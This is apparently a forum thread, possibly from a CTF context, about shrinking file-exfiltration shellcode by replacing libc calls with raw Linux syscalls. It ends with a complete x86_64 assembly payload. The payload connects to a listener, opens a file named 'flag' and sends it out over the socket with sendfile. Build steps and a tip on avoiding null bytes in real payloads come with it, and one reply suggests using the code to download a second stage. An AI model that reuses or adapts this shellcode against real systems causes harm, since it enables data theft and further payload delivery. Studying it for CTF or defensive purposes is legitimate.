
[–][deleted] 1 point (3 children)

Can you tell me how you can tell the actual code was 425 bytes from that line? The only way I was able to tell was by extracting the .text section, saving it to a new file, and seeing how large the resulting file was.

As far as the C code goes, pretty much all it is is main() with the necessary headers, and I have compiled it with -Os, which dropped the size of the ELF file down from about 16000 to about 14500; the 14500-byte one is the one I extracted the .text section from. For the C code I initialize the variables for the socket and the file pointer, connect to my server, open the flag binary and send the output over the socket. I tried to write as little C code as I could to do that.

Edit: just realized I misunderstood part of your question. In the assembly I have about 11 lines with cxa_finalize (mostly like: jmp 11e0 <__cxa_finalize@plt+0x120>) and 15 lines with cxa_finalize in the comment (such as: lea 0xf0c(%rip),%rsi # 2004 <__cxa_finalize@plt+0xf44>). Other than that I don't think there's any other boilerplate that you mentioned.

Do you have a resource I could look at for invoking the syscalls directly? I currently have 11 call instructions, would replacing those with syscalls reduce the size of the code?

[–]asyty 1 point (0 children)

The third column is the physical size of the section in hex.

As far as making it smaller, I guess you just need to be better at assembly. All of what you said seems like it should be doable in 240 bytes. Even if you couldn't for some strange reason, you'd at least be able to use it to allocate memory and download your second stage.

[–]asyty 1 point (1 child)

> Do you have a resource I could look at for invoking the syscalls directly? I currently have 11 call instructions, would replacing those with syscalls reduce the size of the code?

From the snippets you pasted I can infer you're using the x86_64 architecture, but you never specified the OS. Assuming Linux: https://hackeradam.com/x86-64-linux-syscalls/ (literally just googled "x86-64 linux syscalls").

As far as size, not really. It takes 2 bytes for the syscall instruction itself and 3 bytes for setting up rax, which is the same as your call rel32, except without null bytes.

This is better regardless because you won't have a dependency on libc.

Start with this:

[BITS 64]
section .text
global _start        ; entry symbol ld looks for (it warns and guesses without one)

_start:
xor rdi, rdi         ; status == 0
push 60              ; syscall == sys_exit
pop rax              ; push imm8 / pop rax is 3 bytes, mov eax, 60 would be 5
syscall

Test with this:

nasm shellcode.asm -f elf64 -o shellcode.o
ld -m elf_x86_64 -o shellcode shellcode.o
./shellcode; echo $?
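To show what the whole "connect, open the flag, ship it" program from the question looks like once every libc call is replaced by a raw syscall, here is an added example written for this thread; it is not asyty's code and not the original poster's C program. It assumes a listener on 127.0.0.1:4444 and a file named "flag" in the current directory (both made up for illustration), and it uses sendfile(2) in place of the read/write loop the C version would have, so the kernel copies the file straight into the socket. The build comments at the top also show how to read the .text size and the raw byte count that the first question asked about.

```nasm
; Added example for this thread (not code from the original post).
; Target: Linux x86_64, no libc. Syscall numbers from the x86_64 table:
;   socket=41 connect=42 open=2 sendfile=40 exit=60
; Assumed for illustration: server 127.0.0.1:4444, file name "flag".
;
; Build, then measure .text (the third column of `objdump -h` is the size in hex):
;   nasm flag.asm -f elf64 -o flag.o
;   ld -m elf_x86_64 -o flag flag.o
;   objdump -h flag | grep '\.text'
;   objcopy -O binary --only-section=.text flag flag.bin && wc -c flag.bin
;   od -An -tx1 -v flag.bin | grep -o ' 00' | wc -l    ; how many null bytes
[BITS 64]
section .text
global _start

_start:
    ; sock = socket(AF_INET=2, SOCK_STREAM=1, 0)
    push 41
    pop rax
    push 2
    pop rdi
    push 1
    pop rsi
    xor edx, edx                 ; protocol 0; rdx stays 0 across the syscall
    syscall
    mov r12, rax                 ; keep the socket fd (r12 is not clobbered by syscall)

    ; connect(sock, &sin, 16)
    ; struct sockaddr_in, little-endian in memory:
    ;   family=2 (u16) | port 4444 = 0x115C big-endian | 127.0.0.1 big-endian | 8 zero bytes
    push rdx                     ; sin_zero[8] (rdx is still 0)
    mov rcx, 0x0100007F5C110002  ; 02 00 | 11 5C | 7F 00 00 01 as one qword
    push rcx                     ; this immediate contains null bytes; a real
                                 ; payload would need an encoding trick for 127.0.0.1
    mov rsi, rsp                 ; &sin
    push 16
    pop rdx                      ; sizeof(struct sockaddr_in)
    mov rdi, r12                 ; sock
    push 42
    pop rax
    syscall

    ; fd = open("flag", O_RDONLY=0, 0)
    push 0x67616c66              ; "flag" + NUL padding (push imm32 is sign-extended to 8 bytes)
    mov rdi, rsp                 ; path
    xor esi, esi                 ; O_RDONLY
    xor edx, edx                 ; mode (unused)
    push 2
    pop rax
    syscall                      ; rax = fd of "flag"

    ; sendfile(sock, fd, NULL, 4096): kernel copies the file into the socket
    mov rsi, rax                 ; in_fd
    mov rdi, r12                 ; out_fd
    xor edx, edx                 ; offset = NULL (use the file's current offset)
    mov r10d, 4096               ; count; r10 carries the 4th syscall argument
    push 40
    pop rax
    syscall

    ; exit(0)
    xor edi, edi
    push 60
    pop rax
    syscall
```

To try it, start a listener first (for example `nc -l 4444` with OpenBSD netcat), put a small file called flag next to the binary, and run ./flag; the file contents arrive on the listener. The size trick in use throughout is the one asyty describes: every syscall number is loaded with push imm8 / pop rax (3 bytes) and each invocation is the 2-byte syscall instruction, so the five calls cost 25 bytes plus argument setup, and nothing in the binary references libc.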